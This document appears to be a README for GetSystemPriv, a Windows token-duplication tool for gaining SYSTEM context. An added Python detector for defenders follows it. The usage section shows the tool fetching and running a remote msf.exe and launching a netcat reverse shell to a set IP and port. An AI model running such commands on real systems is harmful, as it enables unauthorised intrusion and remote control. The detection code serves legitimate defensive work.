An application that uses token duplication to run a chosen local executable file or one downloaded from a given URL. I'm a big fan of running getsystem while using Meterpreter and seeing SYSTEM context in the list of sessions, but it kind of annoys me when I don't have it using Havoc or any other C2. That's why I created GetSystemPriv.
This project is based on TokenDuplicator by Magnus Stubman.
Local file execution:
GetSystemPriv.exe local C:\Users\test\Desktop\msf.exe
Remote file execution:
GetSystemPriv.exe net http://10.10.14.15/msf.exe
The file is downloaded to a temporary path based on the user directory and deleted immediately once the process is closed.
Command execution:
GetSystemPriv.exe cmd "C:\Windows\Tasks\nc64.exe 192.168.0.122 4444 -e cmd.exe"
Remember to pass the full path of the executables in the command. CreateProcessWithTokenW fails in cmd mode if the parameters to the application are too long. If you're doing a CTF and using a base64-encoded PowerShell one-liner, it may not execute, and your best bet is to upload nc.exe and work from there.
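
For defenders, the effect described above (a program started from a user session that ends up running as SYSTEM) shows up in process-creation telemetry. The following is an added example, not part of GetSystemPriv: it assumes events with Sysmon Event ID 1 style fields in which the new process is logged with the launching process as its parent. The sample events, the `sample.exe` name and the Temp path marker are constructed.

```python
# Added example: flag process creations where a SYSTEM process has a non-SYSTEM parent.
# Field names are modelled on Sysmon Event ID 1 (User, ParentUser, Image, ParentImage).
SYSTEM = "NT AUTHORITY\\SYSTEM"
TEMP_MARKER = "\\appdata\\local\\temp\\"  # assumed per-user temp location

def find_context_jumps(events, allowed_parent_images=()):
    """Return findings for SYSTEM children whose parent ran as another account."""
    allowed = {p.lower() for p in allowed_parent_images}
    findings = []
    for ev in events:
        if ev.get("User", "").upper() != SYSTEM:
            continue  # child is not SYSTEM
        parent_user = ev.get("ParentUser", "")
        if not parent_user or parent_user.upper() == SYSTEM:
            continue  # parent unknown, or ordinary SYSTEM -> SYSTEM spawn
        if ev.get("ParentImage", "").lower() in allowed:
            continue  # parent vetted for this environment
        image = ev.get("Image", "")
        findings.append({
            "image": image,
            "parent_image": ev.get("ParentImage", ""),
            "parent_user": parent_user,
            "from_temp": TEMP_MARKER in image.lower(),  # raises priority
        })
    return findings

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "User": SYSTEM,
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentUser": SYSTEM},
    {"Image": r"C:\Windows\System32\notepad.exe", "User": r"LAB\test",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentUser": r"LAB\test"},
    {"Image": r"C:\Users\test\AppData\Local\Temp\sample.exe", "User": SYSTEM,
     "ParentImage": r"C:\Users\test\Desktop\GetSystemPriv.exe", "ParentUser": r"LAB\test"},
    {"Image": r"C:\Windows\Tasks\nc64.exe", "User": SYSTEM,
     "ParentImage": r"C:\Users\test\Desktop\GetSystemPriv.exe", "ParentUser": r"LAB\test"},
]

if __name__ == "__main__":
    for f in find_context_jumps(SAMPLE_EVENTS):
        tag = "HIGH" if f["from_temp"] else "MEDIUM"
        print(f"[{tag}] {f['image']} as SYSTEM, parent {f['parent_image']} ({f['parent_user']})")
```

Some legitimate software also starts SYSTEM children from user-context parents, so populate `allowed_parent_images` from a baseline of the environment before alerting on the output.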

